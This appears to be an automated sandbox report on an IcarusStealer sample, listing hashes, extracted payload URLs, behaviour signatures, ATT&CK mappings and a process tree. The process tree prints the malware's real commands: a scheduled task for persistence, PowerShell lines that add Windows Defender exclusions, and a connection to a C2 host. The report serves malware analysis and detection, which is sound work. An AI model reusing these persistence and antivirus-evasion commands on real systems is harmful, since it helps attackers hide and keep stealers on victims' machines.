Analysis
-
max time kernel
149s -
max time network
146s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
-
submitted
09/03/2024, 09:49
General
-
Target
custom1.exe
-
Size
24.9MB
-
MD5
4e1c29f0c1af62ddea916c6b80548c76
-
SHA1
38d9f15356b6a65f4e76ee739867d55b01493793
-
SHA256
13b863f0e32c4e25af5b2e323bddf6ea7f8fde1c3dc53bbc463d5a0e9c666882
-
SHA512
f863e54437a36b53f91057f74bdbfcaed90c93256333afe978be5f7b73b417a74084d3a92afe4b6ceea96fd909997cf22b30612c43d6d0d27c64c0bba7db9c28
-
SSDEEP
49152:lfRW10dDWeHzJhNF/CBpOqqUe00zCMe8KfFo:lfw1yaeHLNF/22UwCL8yF
Malware Config
Extracted
icarusstealer
-
payload_url
https://blackhatsec.org/add.jpg
https://blackhatsec.org/remove.jpg
Signatures
-
IcarusStealer
Icarus is a modular stealer written in C# First adverts in July 2022.
-
Modifies Installed Components in the registry 2 TTPs 1 IoCs
-
Executes dropped EXE 6 IoCs
-
Loads dropped DLL 6 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory 4 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
-
Modifies registry class 5 IoCs
-
Modifies system certificate store 2 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 20 IoCs
-
Suspicious use of FindShellTrayWindow 27 IoCs
-
Suspicious use of SendNotifyMessage 17 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\custom1.exe"C:\Users\Admin\AppData\Local\Temp\custom1.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Client.exe"C:\Users\Admin\AppData\Local\Temp\Client.exe"2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$SXR" /tr '"C:\Windows\System32\CatRoot\$SXR\$SXR.exe"' & exit3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "$SXR" /tr '"C:\Windows\System32\CatRoot\$SXR\$SXR.exe"'4⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp42CA.tmp.bat""3⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\timeout.exetimeout 34⤵
- Delays execution with timeout.exe
-
-
C:\Windows\System32\CatRoot\$SXR\$SXR.exe"C:\Windows\System32\CatRoot\$SXR\$SXR.exe"4⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\switched.exe"C:\Users\Admin\AppData\Local\Temp\switched.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\certutil.execertutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD55⤵
-
-
C:\Windows\system32\find.exefind /i /v "md5"5⤵
-
-
C:\Windows\system32\find.exefind /i /v "certutil"5⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\tesetey.exe"C:\Users\Admin\AppData\Local\Temp\tesetey.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\k2udjlwz\k2udjlwz.cmdline"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2D76.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC5CE48864C4014D4F82585FFC44CDA0F8.TMP"5⤵
-
-
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"4⤵
- Modifies Installed Components in the registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\ctfmon.exectfmon.exe5⤵
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM4⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k start /b C:\Users\Admin\AppData\Local\Temp\cvtresa.exe & exit4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\cvtresa.exeC:\Users\Admin\AppData\Local\Temp\cvtresa.exe5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
67KB
MD5753df6889fd7410a2e9fe333da83a429
SHA13c425f16e8267186061dd48ac1c77c122962456e
SHA256b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78
SHA5129d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444
-
Filesize
2.0MB
MD53e2528c36322acb55ee526619c06b97a
SHA1fce4f2d8e03a37936439cf3ae22265087c08d940
SHA2564c4ccc244e47e6324e280d870a3ecef6286d0b47f509d99bcc9d251330e7cbf2
SHA512f037e3cfc9a28dbdef8ef96d6854f52b80c858f0479a3efa1ec60a63a391cc8dff6820d77f13ebc2df61eb0beef9cb6d3708e5beeef97401f2828e663b745997
-
Filesize
4.4MB
MD5bb3d27cbb76e80bafce958986784513b
SHA1730c6592f8ec73090348f7f29c99cf9c20ec7f73
SHA256f8a47036262b660bb40271c94ee5aae36ce56e1dfb258ded5a9749b478d175b6
SHA5121a170fb22d35bee54fdf3a652fefc826a4561fc3ad11ba552375c2259b43664debfe2b5f4d3de00aa5e1787fbf96f21ded035a80ae5606b52a3ed29fc08d3dab
-
Filesize
1KB
MD50c3834d9ebf29b37322ed0498461b83b
SHA1bdbd377a11547b82d7d205bed5710c3dc1bb0be6
SHA256605b12a3af58ba04b3c44beffd7717fd92062ea987d4035a0e27d536351bad9a
SHA512dd0ef9f98bc46d9b9db9127a32f007aed6f869092065b625ef0491147c52b1f66b033db91c79fc61e673e3d5264348ba27e8675703578aad2e7e38be8f08cb42
-
Filesize
4KB
MD5f286a8b56fc70f0d4e83a5ee8ca3dc01
SHA1494042bbebe3d829932547435ad437996463a23a
SHA256655c28ea9a8454bb7e5a6d38b83d1ac59eb7bb0d4ee60bfc3beb42a5954a7406
SHA512fdba8fd6007a6d24fe803af0ac741cf921342485d502c8a7a2cab17b7301f34d04722f5dd66fb396e480d26213c75de431500d4ff0f5097fe9d627a5c92b1422
-
Filesize
1.5MB
MD5d4ec6ad993e63bd25c87075802da69f9
SHA1dc3627b3de59121bfbcf67d85758b8300b4bf218
SHA256cdad11c2e10e87930f496497ee838c45b5f2ca07fa15afb8525a8108f348173b
SHA51206c7d5e1191af95bce9d72d0ad4b99378f29605a87f2235ceb39450a79eafb430bbf7af5f59625360ca3008962d9e046c6f17a1f8a6ad8e33d1a63ec03afbe34
-
Filesize
576KB
MD56239d11b49526790f4c67e7d269fba3c
SHA16f8fad15f6525e354e53a8ac3f32816162992f1f
SHA256b18ca03fa4584b2c8b802dda4cad6445c855b91ff1d881531fbb36b32a9ca235
SHA512794209ba6ef2537fea4d4d253f5d430088abe75624168827a9b973732f959d50e149ad6def1ef42b231be498f5587c1282eab7ca9319e0c61868d91f4e88e3fb
-
Filesize
3.7MB
MD5b9bbe31d276de5c3d05352d070ae4244
SHA15e1bb67b01c579b4e0ad5a7475ceb657201c27ec
SHA256a01977e758a85dc01fb8ca7da9110adfe5bf9b9bec0af1db82741fe83d20408d
SHA5120a3459690bfdf8d238cb6f27c650903659c12aa589bcba037a45c68287342f53ca5c1e1b307a0abd8d481f79e3df6bd994cce6a79258343627aa7b3209b0ed17
-
Filesize
494KB
MD50f0838bc6642dd6bc603368e50b4aba3
SHA1932bd4d1c11996bf8ac3ac74a94b266e96d44c36
SHA2564acfa7fccfdd11c17fbb2e7a861683f749cbf6420f0d83d484a6024ff280a7a9
SHA512a39605eaa160d4f918393c600d42873f2e6bfb54506edfbe590aac0f75d12b4aa66ff91192c0522c235695a9c6b95cd2dbe308b548b5f121ca6b6b7696029860
-
Filesize
150B
MD5ac8e2020447223e4e975b83aa5946443
SHA147118d075883be9145fa0d89a356d0858a928391
SHA2566c092340807b97ac4034d1643c51bbd3241ef8ea2c46f7d475db252507f77bf5
SHA5125ad5fc5477ec7b5f09872d7e2d3d38f6d8897cf4d2ac54f151a5094e971a042980e9d8f00cebf230e7a31afdbc04cb47f05881c77f2cc1b0e9df0536d00e6207
-
Filesize
7KB
MD58de7bf143ec8dca4e42855c93ac91447
SHA15f43445a98f5b185e61913228935ec5b103664a2
SHA256ca9eb4d218b358611cb6816240485fcee3d95d2ab3a3ed9d1cd09d9fbb5e3d96
SHA512b3ec0df55c62da6357124c5068f8178f7622ed9726195ff9c20f15dadbaba470f72a8e335cfebdfc87ac334111e21abc8aaf2425638eccb08c409746eb455903
-
Filesize
6.6MB
MD50dc49b6e4dbce6dae9ac1ab6cf93a373
SHA1dff5f508cf0ec8a61a0f38b93fa1e2f622593a93
SHA256bc93dbc0545dd5c79b2eafdab3ebb33f3bf85620e1d2f9e9c18dd85330eaeb65
SHA512872bcc552bb41f159edd8f1a0add696d6c02cab2f6cb0abb9b3d19454b200df0bce31473f55cd9faf4e6326d13e5d6bf736b65c9f22e1277dc8a832ee9ce2296
-
Filesize
58B
MD579668a6729f0f219835c62c9e43b7927
SHA10cbbc7cc8dbd27923b18285960640f3dad96d146
SHA2566f5747973e572dc3ec0ae4fd9eaf57263abb01c36b35fcddf96e89208b16496e
SHA512bc3895b46db46617315ffaa2ec5e2b44b06e1d4921834be25e1b60b12f2fba900f0f496070eb9f362952abcfa0b3b359bf1ced7da5ec0db63541e0977e6ea4e3
-
Filesize
5.4MB
MD568ba516b447de3a2e8677a9cdbcde54d
SHA1db1faa2ee36e5e6a82f73939eccf863e1c5df933
SHA256da400928bfa0a5e3e404d5a97c3db12492d47cff31d344c96095eebae9ed7ee0
SHA512e5243f4a00b51afa2b8d286dfffdf2838352699d9723dc17c198a44b38ceb23c5b6ef32d0fab7f2921a2332493551c1670aa4af229854a356f54dd51dfd4dd27
-
Filesize
2.1MB
MD5149dac0048d01a8caeb0b9cf76869b12
SHA1d50ec4278a9abfcdd0f3d02e8b1f9c8f51b78cee
SHA256e45617046dbf288932d8819212b911b680d6269134aff64e43daeb2b79275122
SHA5128795b87637ec42f074471b0f0e2eb021c0894fd6e9860e0597481e5e03fcfbf6769f98d6e81bbb5215508ddbb71a3a152a01db9f1f66b2caf2a9bcad1c4d2189
-
Filesize
1KB
MD56d4e315ddb659723cf270858a8023839
SHA10df893c7f7f48483e29d8db81bfabc8456ba24a9
SHA256f6528ea00f868ca00663e6aeff8def75c2db4a0b7012d9836f9267679b0e47f0
SHA51270a5bb19c9384117a21eeb1ce2e44ffc055dbf5ff958e0b912823c353a283606bafb1b7d7a5c942ffe8ecd3890c88b88597d027c19952156fe959962422339a6
-
Filesize
1KB
MD514846c9faaef9299a1bf17730f20e4e6
SHA18083da995cfaa0e8e469780e32fcff1747850eb6
SHA25661bc7b23a430d724b310e374a67a60dd1e1f883c6dd3a98417c8579ba4973c1b
SHA512549d99dbb7376d9d6106ad0219d6cf22eb70c80d54c9ad8c7d0b04a33d956515e55c9608ab6eec0733f2c23602867eb85b43e58200ded129958c7de7ed22efb1
-
Filesize
449B
MD5f9b73cfb9816d1e1e830373f0ffe004b
SHA1cb4f0c348b70a885fffa8fdf971b9a725071b596
SHA25644e1712e7a7ff8c4223c27335f7ae3513d1ff7c6af6861d0b93f870fd07ab771
SHA512781f10a9ec620d8e8fea78bc12924f2cbc916df32e6981486cec3b3025db29ecd4994787ed41937676ef46f298ea630b3629b627e5756decee67012199046eee
-
Filesize
3.6MB
MD57f7dc7f02b4d987ac7178fb4eaf596ce
SHA1819051f145a845e35aaaefb393617d051bc2e5be
SHA256fdc7a21b5c000970a4ed1eaf3467056245cc6ab84c06dc568f4edabff0dd4719
SHA512878d5bf5e4f6a934f5b23869e67299080a3dc892a094a4eff162fbce48c576a2fda1dcbcfbd4b3c723d27438314f10fcca3028d68d793c7a270fa6c57fc3877c
-
Filesize
1.8MB
MD5c3e59b9eafb80d73216089d059a5f07a
SHA1da027c43d4e9c47d3812eb9af90bc713d42b1cfb
SHA256a045c7ebe363974901dba0a32b3a96b4f27de959ef1c1cd6645eb5058d445917
SHA512635d474dbdecf168170ca0096215b701bbcdedd955aab5ac0fd50535b79f3a049905fa3d0e8cdbcfa8724b770d7d6bbace2a05e16e58645b954b724d63297bcb
-
Filesize
7.2MB
MD5fda9464fb859e319359aa2f6fdd8b704
SHA1f690b7417a00a8d13b00fd525958efe730beceda
SHA2567d35d0315cfda3c7ee53ed88399f75e4e30e1c3163b5328e7340b5145da64b92
SHA5125242fd805271703847a3f15e8266c390216dd5648678b6a38ea3efd88c08b528a38ac4e0bf7b05b80b4e8602bc00662727eb966ee37608577e92c629c9ab98fc
-
Filesize
5.7MB
-
Filesize
5.7MB
-
Filesize
256KB
-
Filesize
256KB
-
Filesize
256KB
-
Filesize
5.7MB
-
Filesize
5.7MB
-
Filesize
256KB
-
Filesize
5.7MB
-
Filesize
256KB
-
Filesize
5.7MB
-
Filesize
256KB
-
Filesize
144KB
-
Filesize
4KB
-
Filesize
144KB
-
Filesize
144KB
-
Filesize
6.9MB
-
Filesize
144KB
-
Filesize
144KB
-
Filesize
144KB
-
Filesize
144KB
-
Filesize
256KB
-
Filesize
6.9MB
-
Filesize
520KB
-
Filesize
6.9MB
-
Filesize
6.9MB
-
Filesize
256KB
-
Filesize
6.9MB
-
Filesize
6.9MB
-
Filesize
256KB
-
Filesize
6.2MB
-
Filesize
9.9MB
-
Filesize
32KB
-
Filesize
512KB
-
Filesize
9.9MB
-
Filesize
4KB
-
Filesize
64KB
-
Filesize
4KB
-
Filesize
4.2MB
-
Filesize
4.2MB
-
Filesize
6.2MB
-
Filesize
256KB
-
Filesize
6.9MB
-
Filesize
256KB
-
Filesize
6.9MB